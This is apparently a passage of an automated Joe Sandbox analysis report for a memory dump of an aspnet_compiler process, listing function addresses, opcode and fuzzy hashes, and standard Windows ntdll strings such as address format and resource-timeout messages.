String ID:
API String ID:
Opcode ID: f15efb3a4f2eb054f4a0bc7beb35dea225716827f3e7d6c2e27357dbf6661502
Instruction ID: 2c3a2abf13ef261b12ecd649e55fd3e9342be0b4a91d13bed952eec31965ae07
Opcode Fuzzy Hash: f15efb3a4f2eb054f4a0bc7beb35dea225716827f3e7d6c2e27357dbf6661502
Instruction Fuzzy Hash: A490023160180842D185B558480464B000997D1301F95C415A4025798ECA158B9977A1

Function 015F2BE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 901d7972e3b3288c94c97cc0dffbdf4ba6687939b1789a2e7d1c454bae7f99da
Instruction ID: c235cc36f7ef50eec74e98cf4fceeb0cbaa1bcaa03d25fdda39c8de147d4d742
Opcode Fuzzy Hash: 901d7972e3b3288c94c97cc0dffbdf4ba6687939b1789a2e7d1c454bae7f99da
Instruction Fuzzy Hash: 0590023160584882D145B5584804A47001997D0305F55C411A40647D8ED6258E95B761

Function 015F2B80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 247184a20c1534184d1807438036b58c71fe22bc82d08e32d84d5e4083dd564a
Instruction ID: 923aa41f79f9cb08605e15fd0b68d32e513b0bb38fd809ebd3409c42075dc385
Opcode Fuzzy Hash: 247184a20c1534184d1807438036b58c71fe22bc82d08e32d84d5e4083dd564a
Instruction Fuzzy Hash: 5E90023160180842D109B5584C04687000997D0301F55C411AA024799FD66589D17231

Function 015F2BA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf78032dfccb14f2275cab4078cf69746793be4833e21d130c5b14da8734be0d
Instruction ID: 58a63b639fa0f30d70bb8df7a2c23cd10d3b5b07a2a0509f3c59c2425350b7a1
Opcode Fuzzy Hash: cf78032dfccb14f2275cab4078cf69746793be4833e21d130c5b14da8734be0d
Instruction Fuzzy Hash: 7F900231A0580842D155B5584814747000997D0301F55C411A4024798EC7558B9577A1

Function 015F2AD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 611ac73d04ce068f2f4f6a00455794d302600f195c4671ff3dab4bb13a7b53f3
Instruction ID: 81a0a1e407cc0f764e1bd30e66bf37f6745a782d5b224df142b35d541b646590
Opcode Fuzzy Hash: 611ac73d04ce068f2f4f6a00455794d302600f195c4671ff3dab4bb13a7b53f3
Instruction Fuzzy Hash: 1690022561180043010AF9580B04507004A97D5351355C421F5015694DD62189A15221

Function 015F2AF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13372ca09ffba5a0622140444ca8c8b54d6ac4eb1fa9911b3e45dcf46afbdde3
Instruction ID: ee0cf1db117df40127c98df26ee6521bee16663503fe44a526ff3691d891d9f4
Opcode Fuzzy Hash: 13372ca09ffba5a0622140444ca8c8b54d6ac4eb1fa9911b3e45dcf46afbdde3
Instruction Fuzzy Hash: D590022562180042014AF9580A0450B0449A7D6351395C415F54166D4DC62189A55321

Function 015F2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f5dd824d02da9d2be3f370bbbafd1c3e8c6fa2a8cf286a164551a1a4ca5963a
Instruction ID: 7e4d1c06fd75d99ef874b0f48186ed50d6a70338e09bf8f21d0cba824acfb661
Opcode Fuzzy Hash: 6f5dd824d02da9d2be3f370bbbafd1c3e8c6fa2a8cf286a164551a1a4ca5963a
Instruction Fuzzy Hash: 019002A1601940D24505F6588804B0B450997E0201B55C416E50546A4DC52589919235

Function 015F3D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80348d88e23c09b7cae2ae03427b44df7f18ad31050525232d28a0c445b5e43d
Instruction ID: 2960bc10dedb7a89003d2c04f549f66dca1fac330819f2573fadee83f4583b3e
Opcode Fuzzy Hash: 80348d88e23c09b7cae2ae03427b44df7f18ad31050525232d28a0c445b5e43d
Instruction Fuzzy Hash: 5290023560180442D515B5585C04647004A97D0301F55D811A442469CEC65489E1A221

Function 015F2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1146e333c59b167dc5c973c36dc40d798bddf5dc6d87c4ad0d35ffda5e5e2f76
Instruction ID: f29d9cb147b1299e9ed388af8bb981adb4ff33e62027679596491c623a4264c6
Opcode Fuzzy Hash: 1146e333c59b167dc5c973c36dc40d798bddf5dc6d87c4ad0d35ffda5e5e2f76
Instruction Fuzzy Hash: 4690022961380042D185B558580860B000997D1202F95D815A401569CDC91589A95321

Function 015F3D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06bec3172be7b962b2c8ff8171abf7cde841e5b7675c6654b343adffa6743c86
Instruction ID: 1314f51cccee7f6e0df78fa443ebcc218415f3073e7cbcfa870d1c7c88361887
Opcode Fuzzy Hash: 06bec3172be7b962b2c8ff8171abf7cde841e5b7675c6654b343adffa6743c86
Instruction Fuzzy Hash: B8900231602801829545B6585C04A4F410997E1302B95D815A4015698DC91489A15321

Function 015F2D00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 543c83fefa353c1a492390e704e3024f4509cd35545c7eb192652527a85a63db
Instruction ID: e7f4c35389c6a41420931635f369ea942c116c6a2d980ab12e4ec2cdd88479c1
Opcode Fuzzy Hash: 543c83fefa353c1a492390e704e3024f4509cd35545c7eb192652527a85a63db
Instruction Fuzzy Hash: 1790022160584482D105B9585808A07000997D0205F55D411A50646D9EC6358991A231

Function 015F2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6e12a73f6912f81c9589a60e3d6709ce9726f5feb832be095fca147fd4f4b6d
Instruction ID: b252f8dfedd922debd08ea486ac59a3ce73ff86df15f9086a9447fe8e5041d94
Opcode Fuzzy Hash: d6e12a73f6912f81c9589a60e3d6709ce9726f5feb832be095fca147fd4f4b6d
Instruction Fuzzy Hash: 9F90022170180043D145B55858186074009E7E1301F55D411E4414698DD91589965322

Function 015F2DD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 884c37ede2eb0c14199c1dbd24b20bd15e2d84e5323d9302952837d4675e91e7
Instruction ID: d9fd1d61eaacbfc41f64f36fa190ea3ff48f64a9ec3aff660bf59423e3da807b
Opcode Fuzzy Hash: 884c37ede2eb0c14199c1dbd24b20bd15e2d84e5323d9302952837d4675e91e7
Instruction Fuzzy Hash: 8D90022164284192554AF5584804507400AA7E0241795C412A5414A94DC5269996D721

Function 015F2DB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2a13f13a3ae1804edc44ff77b35384c0a70274e7b24989d1866cf196952c7e7
Instruction ID: ce4b88ba402a4daf31daec9655f2389ea417c47a7404441e7dc52f35e01fa647
Opcode Fuzzy Hash: e2a13f13a3ae1804edc44ff77b35384c0a70274e7b24989d1866cf196952c7e7
Instruction Fuzzy Hash: 9D90023164180442D146B5584804607000DA7D0241F95C412A4424698FC6558B96AB61

Function 015F2C60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24eda908ac30e4c442e26d7fb8ce38427968d0360e8fa79b9967a89b0d5ff7fc
Instruction ID: 65061e5f5cbe6d5649fc01060710bf90e08ca5a3f1c1f8cefd37263dea233b43
Opcode Fuzzy Hash: 24eda908ac30e4c442e26d7fb8ce38427968d0360e8fa79b9967a89b0d5ff7fc
Instruction Fuzzy Hash: FB90023160180882D105B5584804B47000997E0301F55C416A4124798EC615C9917621

Function 015F2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e28a125e5b3c7983c47c271b262dfbfaac9e8ccfb3fb82b8226614e1a9ca8910
Instruction ID: e60d879f3b50dd4bd82511af252ed3874754a2086396666dd6529fa01ec20a5f
Opcode Fuzzy Hash: e28a125e5b3c7983c47c271b262dfbfaac9e8ccfb3fb82b8226614e1a9ca8910
Instruction Fuzzy Hash: 51900221A0580442D145B5585818707001997D0201F55D411A4024698EC6598B9567A1

Function 015F2CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e371b7a3a94f06c10ca84c22fd77ad1dd5cb3526a3bff275ac049af84a3e03c
Instruction ID: 7d484cde0a29eba9573320ba998d674c6a0b2c997a67d6b9216de4178e673aaf
Opcode Fuzzy Hash: 4e371b7a3a94f06c10ca84c22fd77ad1dd5cb3526a3bff275ac049af84a3e03c
Instruction Fuzzy Hash: 5790023160180443D105B5585908707000997D0201F55D811A442469CED65689916221

Function 015F2CA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04a7c1e94df7be4273b1d32c49b72b227ee0e519baa9399fb31bde6419ec72c0
Instruction ID: f596434c60f765f7a3b491a626a92500a966a6df93ab8e1a7e5851f718aa875a
Opcode Fuzzy Hash: 04a7c1e94df7be4273b1d32c49b72b227ee0e519baa9399fb31bde6419ec72c0
Instruction Fuzzy Hash: 4B90023160180442D105B9985808647000997E0301F55D411A9024699FC66589D16231

Function 015F2F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b0d5fadc57dc9ab3b8e044afbf58fc25cfa4e371c4bbe4a0db14ef9cc8d7578
Instruction ID: 0772055cd8aaf214c8f5249e827d6b953fdc90854fb926bb69397e8a8f4bdc96
Opcode Fuzzy Hash: 5b0d5fadc57dc9ab3b8e044afbf58fc25cfa4e371c4bbe4a0db14ef9cc8d7578
Instruction Fuzzy Hash: 2D90026161180082D109B5584804707004997E1201F55C412A6154698DC5298DA15225

Function 015F2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ed1b6c16073dd7d69b2a7f864780041783bb2356fb3cb4ea9e1e629bf2127d
Instruction ID: 4a8edee682b28bfcdc18c5f0fc3b0d300b55ab7f4adca36b1ff9982423ac9bc5
Opcode Fuzzy Hash: 72ed1b6c16073dd7d69b2a7f864780041783bb2356fb3cb4ea9e1e629bf2127d
Instruction Fuzzy Hash: 6190026174180482D105B5584814B070009D7E1301F55C415E5064698EC619CD926226

Function 015F2FE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca69af56eebe7c84009df45704db7451bcc54b5c5a137dcc2bd9f643cde2f559
Instruction ID: b8eeecc0146d97aa98a4de58a4eaaff274c8af4c2b6aae9dcf7e5cc87928f840
Opcode Fuzzy Hash: ca69af56eebe7c84009df45704db7451bcc54b5c5a137dcc2bd9f643cde2f559
Instruction Fuzzy Hash: F6900221611C0082D205B9684C14B07000997D0303F55C515A4154698DC91589A15621

Function 015F2F90 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e17e4efc44982c8e0bc5535c6d2860e56556e3114b2bd128d64591fba1936c09
Instruction ID: 0793f1feb404cd33b50d30bd8b7badc297598dc7638f6ff820bf4dce1dfec169
Opcode Fuzzy Hash: e17e4efc44982c8e0bc5535c6d2860e56556e3114b2bd128d64591fba1936c09
Instruction Fuzzy Hash: DA900231601C0442D105B5584C1470B000997D0302F55C411A5164699EC62589916671

Function 015F2FB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0f38afab8197c254d5e873e1840b54873b8fe6c4daca1a32bb96bbb9c677e9f
Instruction ID: 24f6ae4b669aaedfad90b5dce01dd9063e0f6a8fdfc9cf57ea7e298ced169110
Opcode Fuzzy Hash: c0f38afab8197c254d5e873e1840b54873b8fe6c4daca1a32bb96bbb9c677e9f
Instruction Fuzzy Hash: 5F900221A01800824145B5688C449074009BBE1211755C521A4998694EC55989A55765

Function 015F2FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddaeca01cdb7778bc15c0d0c43cb62bab1873fdcf3c28aa94a58f60642788566
Instruction ID: c553789e56d4508f0c9b6620819911ac6aeaeef8990ed4b41e84b55fc74f55b3
Opcode Fuzzy Hash: ddaeca01cdb7778bc15c0d0c43cb62bab1873fdcf3c28aa94a58f60642788566
Instruction Fuzzy Hash: 21900231601C0442D105B5584C08747000997D0302F55C411A9164699FC665C9D16631

Function 015F2E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff77a6af9cea1a92bc0a437c37d2c8d9bddb2bf89ee0c132365d73283e825419
Instruction ID: 61e020fe903e74065578b699bd91eb4635724102ceb84c4e5adc9720d0cf051c
Opcode Fuzzy Hash: ff77a6af9cea1a92bc0a437c37d2c8d9bddb2bf89ee0c132365d73283e825419
Instruction Fuzzy Hash: 4790022170180442D107B5584814607000DD7D1345F95C412E5424699EC6258A93A232

Function 015F2EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b66c2f71b0c1734321406359ea5d9d423c15aafb35d784b4517333e08aadb802
Instruction ID: a1fc36b9b08b3f2ad154947d476e5e8cdcad001caba918c107b25d5a8bc5028a
Opcode Fuzzy Hash: b66c2f71b0c1734321406359ea5d9d423c15aafb35d784b4517333e08aadb802
Instruction Fuzzy Hash: 9A900261601C0443D145B9584C04607000997D0302F55C411A6064699FCA298D916235

Function 015F2E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e36ddb052724e737632c881a2106ca9ddaf3e43263494710531a629694de8fcb
Instruction ID: 4121fd0c93eeda1bee7b888aeb81690fd44df565e87e5d78a5951bdf5a63b472
Opcode Fuzzy Hash: e36ddb052724e737632c881a2106ca9ddaf3e43263494710531a629694de8fcb
Instruction Fuzzy Hash: 20900221A0180542D106B5584804617000E97D0241F95C422A5024699FCA258AD2A231

Function 015F2EA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbccaf481067e17c47b2a1716d128051848cd0003ff78e3ac06aa87ec6aaee7e
Instruction ID: ad2968dc8a6a37996796544eed1beb06d2773b12659c9c073acc5f56ce320aa3
Opcode Fuzzy Hash: fbccaf481067e17c47b2a1716d128051848cd0003ff78e3ac06aa87ec6aaee7e
Instruction Fuzzy Hash: 4790027160180442D145B5584804747000997D0301F55C411A9064698FC6598ED56765

Function 015F2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 7de3d4e768e5b69d6d68d393a81832bea69c87ecf2353fb717d24a4947dd8f3a
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 015F2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 015F293C
___swprintf_l.LIBCMT ref: 015F295E
___swprintf_l.LIBCMT ref: 015F29A3
___swprintf_l.LIBCMT ref: 0162A52E

Strings

:%u.%u.%u.%u, xrefs: 0162A5B8
::%hs%u.%u.%u.%u, xrefs: 0162A527
::ffff:0:%u.%u.%u.%u, xrefs: 0162A54E
ffff:, xrefs: 0162A504

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 782c59c389900392aeb8a7e2dd03b6de0dc45202d48a886c0a7e897419d07c99
Instruction ID: 0dc63853fb64a337f20a63be5993dcb46c1404a43569caed47fcf8b04186f24d
Opcode Fuzzy Hash: 782c59c389900392aeb8a7e2dd03b6de0dc45202d48a886c0a7e897419d07c99
Instruction Fuzzy Hash: 5551E6B5A00656AFCB11DB9C8D8097FFBB8BB48240F54816DF565DB641D374DE408BA0

Function 015E7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

ExecuteOptions, xrefs: 016246A0
Execute=1, xrefs: 01624713
CLIENT(ntdll): Processing section info %ws..., xrefs: 01624787
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 016246FC
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01624742
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01624725
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01624655

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 494a878e7194767db1bc5f52341c1b07cded1e70ba03230ab1ba6f2a3b01a6e2
Instruction ID: bb5e14c218e41985a7bfeeed6603285a21340a681d20b904ca2bc838c91cef44
Opcode Fuzzy Hash: 494a878e7194767db1bc5f52341c1b07cded1e70ba03230ab1ba6f2a3b01a6e2
Instruction Fuzzy Hash: 3C512C31E4021AAAEF15ABA8DC89FAE77E8FF58304F0400DDD605AF190DB709A458F91

Function 015FB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 015FB6BF

Strings

-, xrefs: 015FB650
0, xrefs: 015FB695
0, xrefs: 015FB66F
+, xrefs: 015FB65A

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 79de276309ee4ee3267b14be682321d6c9488e69a43650a784cb0f68cdabde51
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 1481C170E46249DEEF258E6CC8917FEBBB2BF85360F18461DDA51AF291C7349840CB51

Function 015EBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 01627BAC
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01627B7F
RTL: Resource at %p, xrefs: 01627B8E

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 1c194e47da1e71ec01760a990f5df4d6c765fa5cb48b4f61cdaa2d52bc19c0e1
Instruction ID: b5dd98fc3be62b7ee8decdc90eb168a9a5cb6116cca0b3c7a4734412a6519b1b
Opcode Fuzzy Hash: 1c194e47da1e71ec01760a990f5df4d6c765fa5cb48b4f61cdaa2d52bc19c0e1
Instruction Fuzzy Hash: FB41C231B017029FDB25DE29CC40B6AB7E5FB98712F100A1DEA66DB680DB71E8058B91

Function 015EB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0162728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01627294
RTL: Re-Waiting, xrefs: 016272C1
RTL: Resource at %p, xrefs: 016272A3

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 7a774a7f68fd5e30033a487cd5d5787e4884d6b5071b23508899ed7be2930503
Instruction ID: 082478e7f2f5775e4fcad25c80731291b9219b718143a3f1e733df23476f103f
Opcode Fuzzy Hash: 7a774a7f68fd5e30033a487cd5d5787e4884d6b5071b23508899ed7be2930503
Instruction Fuzzy Hash: 34412F31A01627ABCB25CE29CC41F6AB7E6FBA5711F104619F945EB280DB21E8128BD1

Function 015F7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 015F7E8B

Strings

-, xrefs: 015F7DDD
+, xrefs: 015F7DE8

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: c2d6fb5763e6656a40312e07d7a9206659b9f5ca873565fe83f752f7c7d0e74c
